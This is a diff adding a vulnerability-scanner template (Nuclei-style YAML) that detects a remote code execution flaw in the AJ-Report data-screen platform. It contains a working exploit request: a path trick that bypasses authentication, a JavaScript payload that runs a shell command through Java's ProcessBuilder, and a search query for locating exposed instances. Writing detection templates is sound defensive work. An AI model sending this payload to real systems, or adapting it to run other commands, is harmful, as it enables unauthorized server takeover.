Create aj-report-rce.yaml

http/vulnerabilities/other/aj-report-rce.yaml

@@ -0,0 +1,42 @@
+id: aj-report-rce
+
+info:
+  name: AJ-Report Open Source Data Screen - Remote Code Execution
+  author: pussycat0x
+  severity: high
+  description: |
+    AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious.
+  reference:
+    - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    fofa-query: title="AJ-Report"
+  tags: aj-report,rce
+
+http:
+  - raw:
+      - |
+        POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+        Content-Type: application/json;charset=UTF-8
+
+        {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}        
+
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "code"
+          - "data"
+        condition: and
+
+      - type: regex
+        part: body
+        regex:
+          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"  
+
+      - type: status
+        status:
+          - 200